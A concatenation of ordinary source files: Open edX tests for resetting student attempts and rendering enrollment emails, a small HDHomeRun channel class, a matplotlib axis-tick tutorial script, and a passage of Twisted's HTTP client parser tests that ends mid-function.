student=self.user,
course_id=self.course_key,
module_state_key=self.unrelated.location,
state=unrelated_state,
)
def test_reset_student_attempts(self):
msk = self.course_key.make_usage_key('dummy', 'module')
original_state = json.dumps({'attempts': 32, 'otherstuff': 'alsorobots'})
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=msk,
state=original_state
)
# lambda to reload the module state from the database
module = lambda: StudentModule.objects.get(student=self.user, course_id=self.course_key, module_state_key=msk)
self.assertEqual(json.loads(module().state)['attempts'], 32)
reset_student_attempts(self.course_key, self.user, msk, requesting_user=self.user)
self.assertEqual(json.loads(module().state)['attempts'], 0)
def test_delete_student_attempts(self):
msk = self.course_key.make_usage_key('dummy', 'module')
original_state = json.dumps({'attempts': 32, 'otherstuff': 'alsorobots'})
StudentModule.objects.create(
student=self.user,
course_id=self.course_key,
module_state_key=msk,
state=original_state
)
self.assertEqual(
StudentModule.objects.filter(
student=self.user,
course_id=self.course_key,
module_state_key=msk
).count(), 1)
reset_student_attempts(self.course_key, self.user, msk, requesting_user=self.user, delete_module=True)
self.assertEqual(
StudentModule.objects.filter(
student=self.user,
course_id=self.course_key,
module_state_key=msk
).count(), 0)
# Disable the score change signal to prevent other components from being
# pulled into tests.
@mock.patch('courseware.module_render.SCORE_CHANGED.send')
def test_delete_submission_scores(self, _lti_mock):
user = UserFactory()
problem_location = self.course_key.make_usage_key('dummy', 'module')
# Create a student module for the user
StudentModule.objects.create(
student=user,
course_id=self.course_key,
module_state_key=problem_location,
state=json.dumps({})
)
# Create a submission and score for the student using the submissions API
student_item = {
'student_id': anonymous_id_for_user(user, self.course_key),
'course_id': self.course_key.to_deprecated_string(),
'item_id': problem_location.to_deprecated_string(),
'item_type': 'openassessment'
}
submission = sub_api.create_submission(student_item, 'test answer')
sub_api.set_score(submission['uuid'], 1, 2)
# Delete student state using the instructor dash
reset_student_attempts(
self.course_key, user, problem_location,
requesting_user=user,
delete_module=True,
)
# Verify that the student's scores have been reset in the submissions API
score = sub_api.get_score(student_item)
self.assertIs(score, None)
def get_state(self, location):
"""Reload and grab the module state from the database"""
return StudentModule.objects.get(
student=self.user, course_id=self.course_key, module_state_key=location
).state
def test_reset_student_attempts_children(self):
parent_state = json.loads(self.get_state(self.parent.location))
self.assertEqual(parent_state['attempts'], 32)
self.assertEqual(parent_state['otherstuff'], 'alsorobots')
child_state = json.loads(self.get_state(self.child.location))
self.assertEqual(child_state['attempts'], 10)
self.assertEqual(child_state['whatever'], 'things')
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
reset_student_attempts(self.course_key, self.user, self.parent.location, requesting_user=self.user)
parent_state = json.loads(self.get_state(self.parent.location))
self.assertEqual(json.loads(self.get_state(self.parent.location))['attempts'], 0)
self.assertEqual(parent_state['otherstuff'], 'alsorobots')
child_state = json.loads(self.get_state(self.child.location))
self.assertEqual(child_state['attempts'], 0)
self.assertEqual(child_state['whatever'], 'things')
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
def test_delete_submission_scores_attempts_children(self):
parent_state = json.loads(self.get_state(self.parent.location))
self.assertEqual(parent_state['attempts'], 32)
self.assertEqual(parent_state['otherstuff'], 'alsorobots')
child_state = json.loads(self.get_state(self.child.location))
self.assertEqual(child_state['attempts'], 10)
self.assertEqual(child_state['whatever'], 'things')
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
reset_student_attempts(
self.course_key,
self.user,
self.parent.location,
requesting_user=self.user,
delete_module=True,
)
self.assertRaises(StudentModule.DoesNotExist, self.get_state, self.parent.location)
self.assertRaises(StudentModule.DoesNotExist, self.get_state, self.child.location)
unrelated_state = json.loads(self.get_state(self.unrelated.location))
self.assertEqual(unrelated_state['attempts'], 12)
self.assertEqual(unrelated_state['brains'], 'zombie')
class EnrollmentObjects(object):
"""
Container for enrollment objects.
`email` - student email
`user` - student User object
`cenr` - CourseEnrollment object
`cea` - CourseEnrollmentAllowed object
Any of the objects except email can be None.
"""
def __init__(self, email, user, cenr, cea):
self.email = email
self.user = user
self.cenr = cenr
self.cea = cea
class SettableEnrollmentState(EmailEnrollmentState):
"""
Settable enrollment state.
Used for testing state changes.
SettableEnrollmentState can be constructed and then
a call to create_user will make objects which
correspond to the state represented in the SettableEnrollmentState.
"""
def __init__(self, user=False, enrollment=False, allowed=False, auto_enroll=False): # pylint: disable=super-init-not-called
self.user = user
self.enrollment = enrollment
self.allowed = allowed
self.auto_enroll = auto_enroll
def __eq__(self, other):
return self.to_dict() == other.to_dict()
def __neq__(self, other):
return not self == other
def create_user(self, course_id=None):
"""
Utility method to possibly create and possibly enroll a user.
Creates a state matching the SettableEnrollmentState properties.
Returns a tuple of (
email,
User, (optionally None)
CourseEnrollment, (optionally None)
CourseEnrollmentAllowed, (optionally None)
)
"""
# if self.user=False, then this will just be used to generate an email.
email = "robot_no_user_exists_with_this_email@edx.org"
if self.user:
user = UserFactory()
email = user.email
if self.enrollment:
cenr = CourseEnrollment.enroll(user, course_id)
return EnrollmentObjects(email, user, cenr, None)
else:
return EnrollmentObjects(email, user, None, None)
elif self.allowed:
cea = CourseEnrollmentAllowed.objects.create(
email=email,
course_id=course_id,
auto_enroll=self.auto_enroll,
)
return EnrollmentObjects(email, None, None, cea)
else:
return EnrollmentObjects(email, None, None, None)
@attr('shard_1')
class TestSendBetaRoleEmail(TestCase):
"""
Test edge cases for `send_beta_role_email`
"""
def setUp(self):
super(TestSendBetaRoleEmail, self).setUp()
self.user = UserFactory.create()
self.email_params = {'course': 'Robot Super Course'}
def test_bad_action(self):
bad_action = 'beta_tester'
error_msg = "Unexpected action received '{}' - expected 'add' or 'remove'".format(bad_action)
with self.assertRaisesRegexp(ValueError, error_msg):
send_beta_role_email(bad_action, self.user, self.email_params)
@attr('shard_1')
class TestGetEmailParamsCCX(SharedModuleStoreTestCase):
"""
Test what URLs the function get_email_params for CCX student enrollment.
"""
MODULESTORE = TEST_DATA_SPLIT_MODULESTORE
@classmethod
def setUpClass(cls):
super(TestGetEmailParamsCCX, cls).setUpClass()
cls.course = CourseFactory.create()
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def setUp(self):
super(TestGetEmailParamsCCX, self).setUp()
self.coach = AdminFactory.create()
role = CourseCcxCoachRole(self.course.id)
role.add_users(self.coach)
self.ccx = CcxFactory(course_id=self.course.id, coach=self.coach)
self.course_key = CCXLocator.from_course_locator(self.course.id, self.ccx.id)
# Explicitly construct what we expect the course URLs to be
site = settings.SITE_NAME
self.course_url = u'https://{}/courses/{}/'.format(
site,
self.course_key
)
self.course_about_url = self.course_url + 'about'
self.registration_url = u'https://{}/register'.format(site)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_ccx_enrollment_email_params(self):
# For a CCX, what do we expect to get for the URLs?
# Also make sure `auto_enroll` is properly passed through.
result = get_email_params(
self.course,
True,
course_key=self.course_key,
display_name=self.ccx.display_name
)
self.assertEqual(result['display_name'], self.ccx.display_name)
self.assertEqual(result['auto_enroll'], True)
self.assertEqual(result['course_about_url'], self.course_about_url)
self.assertEqual(result['registration_url'], self.registration_url)
self.assertEqual(result['course_url'], self.course_url)
@attr('shard_1')
class TestGetEmailParams(SharedModuleStoreTestCase):
"""
Test what URLs the function get_email_params returns under different
production-like conditions.
"""
@classmethod
def setUpClass(cls):
super(TestGetEmailParams, cls).setUpClass()
cls.course = CourseFactory.create()
# Explicitly construct what we expect the course URLs to be
site = settings.SITE_NAME
cls.course_url = u'https://{}/courses/{}/'.format(
site,
cls.course.id.to_deprecated_string()
)
cls.course_about_url = cls.course_url + 'about'
cls.registration_url = u'https://{}/register'.format(site)
def setUp(self):
super(TestGetEmailParams, self).setUp()
def test_normal_params(self):
# For a normal site, what do we expect to get for the URLs?
# Also make sure `auto_enroll` is properly passed through.
result = get_email_params(self.course, False)
self.assertEqual(result['auto_enroll'], False)
self.assertEqual(result['course_about_url'], self.course_about_url)
self.assertEqual(result['registration_url'], self.registration_url)
self.assertEqual(result['course_url'], self.course_url)
def test_marketing_params(self):
# For a site with a marketing front end, what do we expect to get for the URLs?
# Also make sure `auto_enroll` is properly passed through.
with mock.patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': True}):
result = get_email_params(self.course, True)
self.assertEqual(result['auto_enroll'], True)
# We should *not* get a course about url (LMS doesn't know what the marketing site URLs are)
self.assertEqual(result['course_about_url'], None)
self.assertEqual(result['registration_url'], self.registration_url)
self.assertEqual(result['course_url'], self.course_url)
@attr('shard_1')
class TestRenderMessageToString(SharedModuleStoreTestCase):
"""
Test that email templates can be rendered in a language chosen manually.
Test CCX enrollmet email.
"""
MODULESTORE = TEST_DATA_SPLIT_MODULESTORE
@classmethod
def setUpClass(cls):
super(TestRenderMessageToString, cls).setUpClass()
cls.course = CourseFactory.create()
cls.subject_template = 'emails/enroll_email_allowedsubject.txt'
cls.message_template = 'emails/enroll_email_allowedmessage.txt'
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def setUp(self):
super(TestRenderMessageToString, self).setUp()
coach = AdminFactory.create()
role = CourseCcxCoachRole(self.course.id)
role.add_users(coach)
self.ccx = CcxFactory(course_id=self.course.id, coach=coach)
self.course_key = CCXLocator.from_course_locator(self.course.id, self.ccx.id)
def get_email_params(self):
"""
Returns a dictionary of parameters used to render an email.
"""
email_params = get_email_params(self.course, True)
email_params["email_address"] = "user@example.com"
email_params["full_name"] = "Jean Reno"
return email_params
def get_email_params_ccx(self):
"""
Returns a dictionary of parameters used to render an email for CCX.
"""
email_params = get_email_params(
self.course,
True,
course_key=self.course_key,
display_name=self.ccx.display_name
)
email_params["email_address"] = "user@example.com"
email_params["full_name"] = "Jean Reno"
return email_params
def get_subject_and_message(self, language):
"""
Returns the subject and message rendered in the specified language.
"""
return render_message_to_string(
self.subject_template,
self.message_template,
self.get_email_params(),
language=language
)
def get_subject_and_message_ccx(self, subject_template, message_template):
"""
Returns the subject and message rendered in the specified language for CCX.
"""
return render_message_to_string(
subject_template,
message_template,
self.get_email_params_ccx()
)
def test_subject_and_message_translation(self):
subject, message = self.get_subject_and_message('fr')
language_after_rendering = get_language()
you_have_been_invited_in_french = u"Vous avez été invité"
self.assertIn(you_have_been_invited_in_french, subject)
self.assertIn(you_have_been_invited_in_french, message)
self.assertEqual(settings.LANGUAGE_CODE, language_after_rendering)
def test_platform_language_is_used_for_logged_in_user(self):
with override_language('zh_CN'): # simulate a user login
subject, message = self.get_subject_and_message(None)
self.assertIn("You have been", subject)
self.assertIn("You have been", message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_enrollment_message_ccx_members(self):
"""
Test enrollment email template renders for CCX.
For EDX members.
"""
subject_template = 'emails/enroll_email_enrolledsubject.txt'
message_template = 'emails/enroll_email_enrolledmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
site = settings.SITE_NAME
course_url = u'https://{}/courses/{}/'.format(
site,
self.course_key
)
self.assertIn(course_url, message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_unenrollment_message_ccx_members(self):
"""
Test unenrollment email template renders for CCX.
For EDX members.
"""
subject_template = 'emails/unenroll_email_subject.txt'
message_template = 'emails/unenroll_email_enrolledmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_enrollment_message_ccx_non_members(self):
"""
Test enrollment email template renders for CCX.
For non EDX members.
"""
subject_template = 'emails/enroll_email_allowedsubject.txt'
message_template = 'emails/enroll_email_allowedmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
site = settings.SITE_NAME
registration_url = u'https://{}/register'.format(site)
self.assertIn(registration_url, message)
@patch.dict('django.conf.settings.FEATURES', {'CUSTOM_COURSES_EDX': True})
def test_render_unenrollment_message_ccx_non_members(self):
"""
Test unenrollment email template renders for CCX.
For non EDX members.
"""
subject_template = 'emails/unenroll_email_subject.txt'
message_template = 'emails/unenroll_email_allowedmessage.txt'
subject, message = self.get_subject_and_message_ccx(subject_template, message_template)
self.assertIn(self.ccx.display_name, subject)
self.assertIn(self.ccx.display_name, message)
|
astrilchuk/sd2xmltv | refs/heads/master | libhdhomerun/common/channel.py | 1 |
class Channel(object):
def __init__(self):
self.guide_number = None # type: unicode
self.guide_name = None # type: unicode
self.url = None # type: unicode
self.is_hd = False # type: bool
self.is_favorite = False # type: bool
def __unicode__(self): # type: () -> unicode
return "{0.guide_number} {0.guide_name}".format(self)
def __str__(self):
return unicode(self).encode("utf-8")
@classmethod
def from_dict(cls, dct): # type: (dict) -> Channel
channel = cls()
if "GuideNumber" in dct:
channel.guide_number = dct.pop("GuideNumber")
if "GuideName" in dct:
channel.guide_name = dct.pop("GuideName")
if "URL" in dct:
channel.url = dct.pop("URL")
if "HD" in dct:
if dct.pop("HD") == 1:
channel.is_hd = True
if "Favorite" in dct:
if dct.pop("Favorite") == 1:
channel.is_favorite = True
return channel
|
wangwei7175878/tutorials | refs/heads/master | matplotlibTUT/plt9_tick_visibility.py | 3 | # View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
# 9 - tick_visibility
"""
Please note, this script is for python3+.
If you are using python2+, please modify it accordingly.
Tutorial reference:
http://www.scipy-lectures.org/intro/matplotlib/matplotlib.html
"""
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(-3, 3, 50)
y = 0.1*x
plt.figure()
plt.plot(x, y, linewidth=10)
plt.ylim(-2, 2)
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0))
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0))
for label in ax.get_xticklabels() + ax.get_yticklabels():
label.set_fontsize(12)
label.set_bbox(dict(facecolor='white', edgecolor='None', alpha=0.7))
plt.show()
|
rockyzhang/zhangyanhit-python-for-android-mips | refs/heads/master | python-modules/twisted/twisted/web/test/test_newclient.py | 49 | # Copyright (c) 2009-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web._newclient}.
"""
__metaclass__ = type
from zope.interface import implements
from zope.interface.verify import verifyObject
from twisted.python import log
from twisted.python.failure import Failure
from twisted.internet.interfaces import IConsumer, IPushProducer
from twisted.internet.error import ConnectionDone
from twisted.internet.defer import Deferred, succeed, fail
from twisted.internet.protocol import Protocol
from twisted.trial.unittest import TestCase
from twisted.test.proto_helpers import StringTransport, AccumulatingProtocol
from twisted.web._newclient import UNKNOWN_LENGTH, STATUS, HEADER, BODY, DONE
from twisted.web._newclient import Request, Response, HTTPParser, HTTPClientParser
from twisted.web._newclient import BadResponseVersion, ParseError, HTTP11ClientProtocol
from twisted.web._newclient import ChunkedEncoder, RequestGenerationFailed
from twisted.web._newclient import RequestTransmissionFailed, ResponseFailed
from twisted.web._newclient import WrongBodyLength, RequestNotSent
from twisted.web._newclient import ConnectionAborted
from twisted.web._newclient import BadHeaders, ResponseDone, PotentialDataLoss, ExcessWrite
from twisted.web._newclient import TransportProxyProducer, LengthEnforcingConsumer, makeStatefulDispatcher
from twisted.web.http_headers import Headers
from twisted.web.http import _DataLoss
from twisted.web.iweb import IBodyProducer
class ArbitraryException(Exception):
"""
A unique, arbitrary exception type which L{twisted.web._newclient} knows
nothing about.
"""
class AnotherArbitraryException(Exception):
"""
Similar to L{ArbitraryException} but with a different identity.
"""
# A re-usable Headers instance for tests which don't really care what headers
# they're sending.
_boringHeaders = Headers({'host': ['example.com']})
def assertWrapperExceptionTypes(self, deferred, mainType, reasonTypes):
"""
Assert that the given L{Deferred} fails with the exception given by
C{mainType} and that the exceptions wrapped by the instance of C{mainType}
it fails with match the list of exception types given by C{reasonTypes}.
This is a helper for testing failures of exceptions which subclass
L{_newclient._WrapperException}.
@param self: A L{TestCase} instance which will be used to make the
assertions.
@param deferred: The L{Deferred} which is expected to fail with
C{mainType}.
@param mainType: A L{_newclient._WrapperException} subclass which will be
trapped on C{deferred}.
@param reasonTypes: A sequence of exception types which will be trapped on
the resulting L{mainType} exception instance's C{reasons} sequence.
@return: A L{Deferred} which fires with the C{mainType} instance
C{deferred} fails with, or which fails somehow.
"""
def cbFailed(err):
for reason, type in zip(err.reasons, reasonTypes):
reason.trap(type)
self.assertEqual(len(err.reasons), len(reasonTypes),
"len(%s) != len(%s)" % (err.reasons, reasonTypes))
return err
d = self.assertFailure(deferred, mainType)
d.addCallback(cbFailed)
return d
def assertResponseFailed(self, deferred, reasonTypes):
"""
A simple helper to invoke L{assertWrapperExceptionTypes} with a C{mainType}
of L{ResponseFailed}.
"""
return assertWrapperExceptionTypes(self, deferred, ResponseFailed, reasonTypes)
def assertRequestGenerationFailed(self, deferred, reasonTypes):
"""
A simple helper to invoke L{assertWrapperExceptionTypes} with a C{mainType}
of L{RequestGenerationFailed}.
"""
return assertWrapperExceptionTypes(self, deferred, RequestGenerationFailed, reasonTypes)
def assertRequestTransmissionFailed(self, deferred, reasonTypes):
"""
A simple helper to invoke L{assertWrapperExceptionTypes} with a C{mainType}
of L{RequestTransmissionFailed}.
"""
return assertWrapperExceptionTypes(self, deferred, RequestTransmissionFailed, reasonTypes)
def justTransportResponse(transport):
"""
Helper function for creating a Response which uses the given transport.
All of the other parameters to L{Response.__init__} are filled with
arbitrary values. Only use this method if you don't care about any of
them.
"""
return Response(('HTTP', 1, 1), 200, 'OK', _boringHeaders, transport)
class MakeStatefulDispatcherTests(TestCase):
"""
Tests for L{makeStatefulDispatcher}.
"""
def test_functionCalledByState(self):
"""
A method defined with L{makeStatefulDispatcher} invokes a second
method based on the current state of the object.
"""
class Foo:
_state = 'A'
def bar(self):
pass
bar = makeStatefulDispatcher('quux', bar)
def _quux_A(self):
return 'a'
def _quux_B(self):
return 'b'
stateful = Foo()
self.assertEqual(stateful.bar(), 'a')
stateful._state = 'B'
self.assertEqual(stateful.bar(), 'b')
stateful._state = 'C'
self.assertRaises(RuntimeError, stateful.bar)
class HTTPParserTests(TestCase):
"""
Tests for L{HTTPParser} which is responsible for the bulk of the task of
parsing HTTP bytes.
"""
def test_statusCallback(self):
"""
L{HTTPParser} calls its C{statusReceived} method when it receives a
status line.
"""
status = []
protocol = HTTPParser()
protocol.statusReceived = status.append
protocol.makeConnection(StringTransport())
self.assertEqual(protocol.state, STATUS)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
self.assertEqual(status, ['HTTP/1.1 200 OK'])
self.assertEqual(protocol.state, HEADER)
def _headerTestSetup(self):
header = {}
protocol = HTTPParser()
protocol.headerReceived = header.__setitem__
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
return header, protocol
def test_headerCallback(self):
"""
L{HTTPParser} calls its C{headerReceived} method when it receives a
header.
"""
header, protocol = self._headerTestSetup()
protocol.dataReceived('X-Foo:bar\r\n')
# Cannot tell it's not a continue header until the next line arrives
# and is not a continuation
protocol.dataReceived('\r\n')
self.assertEqual(header, {'X-Foo': 'bar'})
self.assertEqual(protocol.state, BODY)
def test_continuedHeaderCallback(self):
"""
If a header is split over multiple lines, L{HTTPParser} calls
C{headerReceived} with the entire value once it is received.
"""
header, protocol = self._headerTestSetup()
protocol.dataReceived('X-Foo: bar\r\n')
protocol.dataReceived(' baz\r\n')
protocol.dataReceived('\tquux\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(header, {'X-Foo': 'bar baz\tquux'})
self.assertEqual(protocol.state, BODY)
def test_fieldContentWhitespace(self):
"""
Leading and trailing linear whitespace is stripped from the header
value passed to the C{headerReceived} callback.
"""
header, protocol = self._headerTestSetup()
value = ' \t \r\n bar \t\r\n \t\r\n'
protocol.dataReceived('X-Bar:' + value)
protocol.dataReceived('X-Foo:' + value)
protocol.dataReceived('\r\n')
self.assertEqual(header, {'X-Foo': 'bar',
'X-Bar': 'bar'})
def test_allHeadersCallback(self):
"""
After the last header is received, L{HTTPParser} calls
C{allHeadersReceived}.
"""
called = []
header, protocol = self._headerTestSetup()
def allHeadersReceived():
called.append(protocol.state)
protocol.state = STATUS
protocol.allHeadersReceived = allHeadersReceived
protocol.dataReceived('\r\n')
self.assertEqual(called, [HEADER])
self.assertEqual(protocol.state, STATUS)
def test_noHeaderCallback(self):
"""
If there are no headers in the message, L{HTTPParser} does not call
C{headerReceived}.
"""
header, protocol = self._headerTestSetup()
protocol.dataReceived('\r\n')
self.assertEqual(header, {})
self.assertEqual(protocol.state, BODY)
def test_headersSavedOnResponse(self):
"""
All headers received by L{HTTPParser} are added to
L{HTTPParser.headers}.
"""
protocol = HTTPParser()
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('X-Foo: bar\r\n')
protocol.dataReceived('X-Foo: baz\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
list(protocol.headers.getAllRawHeaders()),
[('X-Foo', ['bar', 'baz'])])
def test_connectionControlHeaders(self):
"""
L{HTTPParser.isConnectionControlHeader} returns C{True} for headers
which are always connection control headers (similar to "hop-by-hop"
headers from RFC 2616 section 13.5.1) and C{False} for other headers.
"""
protocol = HTTPParser()
connHeaderNames = [
'content-length', 'connection', 'keep-alive', 'te', 'trailers',
'transfer-encoding', 'upgrade', 'proxy-connection']
for header in connHeaderNames:
self.assertTrue(
protocol.isConnectionControlHeader(header),
"Expecting %r to be a connection control header, but "
"wasn't" % (header,))
self.assertFalse(
protocol.isConnectionControlHeader("date"),
"Expecting the arbitrarily selected 'date' header to not be "
"a connection control header, but was.")
def test_switchToBodyMode(self):
"""
L{HTTPParser.switchToBodyMode} raises L{RuntimeError} if called more
than once.
"""
protocol = HTTPParser()
protocol.makeConnection(StringTransport())
protocol.switchToBodyMode(object())
self.assertRaises(RuntimeError, protocol.switchToBodyMode, object())
class HTTPClientParserTests(TestCase):
"""
Tests for L{HTTPClientParser} which is responsible for parsing HTTP
response messages.
"""
def test_parseVersion(self):
"""
L{HTTPClientParser.parseVersion} parses a status line into its three
components.
"""
protocol = HTTPClientParser(None, None)
self.assertEqual(
protocol.parseVersion('CANDY/7.2'),
('CANDY', 7, 2))
def test_parseBadVersion(self):
"""
L{HTTPClientParser.parseVersion} raises L{ValueError} when passed an
unparsable version.
"""
protocol = HTTPClientParser(None, None)
e = BadResponseVersion
f = protocol.parseVersion
def checkParsing(s):
exc = self.assertRaises(e, f, s)
self.assertEqual(exc.data, s)
checkParsing('foo')
checkParsing('foo/bar/baz')
checkParsing('foo/')
checkParsing('foo/..')
checkParsing('foo/a.b')
checkParsing('foo/-1.-1')
def test_responseStatusParsing(self):
"""
L{HTTPClientParser.statusReceived} parses the version, code, and phrase
from the status line and stores them on the response object.
"""
request = Request('GET', '/', _boringHeaders, None)
protocol = HTTPClientParser(request, None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
self.assertEqual(protocol.response.version, ('HTTP', 1, 1))
self.assertEqual(protocol.response.code, 200)
self.assertEqual(protocol.response.phrase, 'OK')
def test_badResponseStatus(self):
"""
L{HTTPClientParser.statusReceived} raises L{ParseError} if it is called
with a status line which cannot be parsed.
"""
protocol = HTTPClientParser(None, None)
def checkParsing(s):
exc = self.assertRaises(ParseError, protocol.statusReceived, s)
self.assertEqual(exc.data, s)
# If there are fewer than three whitespace-delimited parts to the
# status line, it is not valid and cannot be parsed.
checkParsing('foo')
checkParsing('HTTP/1.1 200')
# If the response code is not an integer, the status line is not valid
# and cannot be parsed.
checkParsing('HTTP/1.1 bar OK')
def _noBodyTest(self, request, response):
"""
Assert that L{HTTPClientParser} parses the given C{response} to
C{request}, resulting in a response with no body and no extra bytes and
leaving the transport in the producing state.
@param request: A L{Request} instance which might have caused a server
to return the given response.
@param response: A string giving the response to be parsed.
@return: A C{dict} of headers from the response.
"""
header = {}
finished = []
protocol = HTTPClientParser(request, finished.append)
protocol.headerReceived = header.__setitem__
body = []
protocol._bodyDataReceived = body.append
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived(response)
self.assertEqual(transport.producerState, 'producing')
self.assertEqual(protocol.state, DONE)
self.assertEqual(body, [])
self.assertEqual(finished, [''])
self.assertEqual(protocol.response.length, 0)
return header
def test_headResponse(self):
"""
If the response is to a HEAD request, no body is expected, the body
callback is not invoked, and the I{Content-Length} header is passed to
the header callback.
"""
request = Request('HEAD', '/', _boringHeaders, None)
status = (
'HTTP/1.1 200 OK\r\n'
'Content-Length: 10\r\n'
'\r\n')
header = self._noBodyTest(request, status)
self.assertEqual(header, {'Content-Length': '10'})
def test_noContentResponse(self):
"""
If the response code is I{NO CONTENT} (204), no body is expected and
the body callback is not invoked.
"""
request = Request('GET', '/', _boringHeaders, None)
status = (
'HTTP/1.1 204 NO CONTENT\r\n'
'\r\n')
self._noBodyTest(request, status)
def test_notModifiedResponse(self):
"""
If the response code is I{NOT MODIFIED} (304), no body is expected and
the body callback is not invoked.
"""
request = Request('GET', '/', _boringHeaders, None)
status = (
'HTTP/1.1 304 NOT MODIFIED\r\n'
'\r\n')
self._noBodyTest(request, status)
def test_responseHeaders(self):
"""
The response headers are added to the response object's C{headers}
L{Headers} instance.
"""
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
lambda rest: None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('X-Foo: bar\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
protocol.connHeaders,
Headers({}))
self.assertEqual(
protocol.response.headers,
Headers({'x-foo': ['bar']}))
self.assertIdentical(protocol.response.length, UNKNOWN_LENGTH)
def test_connectionHeaders(self):
"""
The connection control headers are added to the parser's C{connHeaders}
L{Headers} instance.
"""
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
lambda rest: None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 123\r\n')
protocol.dataReceived('Connection: close\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
protocol.response.headers,
Headers({}))
self.assertEqual(
protocol.connHeaders,
Headers({'content-length': ['123'],
'connection': ['close']}))
self.assertEqual(protocol.response.length, 123)
def test_headResponseContentLengthEntityHeader(self):
"""
If a HEAD request is made, the I{Content-Length} header in the response
is added to the response headers, not the connection control headers.
"""
protocol = HTTPClientParser(
Request('HEAD', '/', _boringHeaders, None),
lambda rest: None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 123\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
protocol.response.headers,
Headers({'content-length': ['123']}))
self.assertEqual(
protocol.connHeaders,
Headers({}))
self.assertEqual(protocol.response.length, 0)
def test_contentLength(self):
"""
If a response includes a body with a length given by the
I{Content-Length} header, the bytes which make up the body are passed
to the C{_bodyDataReceived} callback on the L{HTTPParser}.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('Content-Length: 10\r\n')
protocol.dataReceived('\r\n')
# Incidentally, the transport should be paused now. It is the response
# object's responsibility to resume this when it is ready for bytes.
self.assertEqual(transport.producerState, 'paused')
self.assertEqual(protocol.state, BODY)
protocol.dataReceived('x' * 6)
self.assertEqual(body, ['x' * 6])
self.assertEqual(protocol.state, BODY)
protocol.dataReceived('y' * 4)
self.assertEqual(body, ['x' * 6, 'y' * 4])
self.assertEqual(protocol.state, DONE)
self.assertTrue(finished, [''])
def test_zeroContentLength(self):
"""
If a response includes a I{Content-Length} header indicating zero bytes
in the response, L{Response.length} is set accordingly and no data is
delivered to L{Response._bodyDataReceived}.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('Content-Length: 0\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(protocol.state, DONE)
self.assertEqual(body, [])
self.assertTrue(finished, [''])
self.assertEqual(protocol.response.length, 0)
def test_multipleContentLengthHeaders(self):
"""
If a response includes multiple I{Content-Length} headers,
L{HTTPClientParser.dataReceived} raises L{ValueError} to indicate that
the response is invalid and the transport is now unusable.
"""
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
None)
protocol.makeConnection(StringTransport())
self.assertRaises(
ValueError,
protocol.dataReceived,
'HTTP/1.1 200 OK\r\n'
'Content-Length: 1\r\n'
'Content-Length: 2\r\n'
'\r\n')
def test_extraBytesPassedBack(self):
"""
If extra bytes are received past the end of a response, they are passed
to the finish callback.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
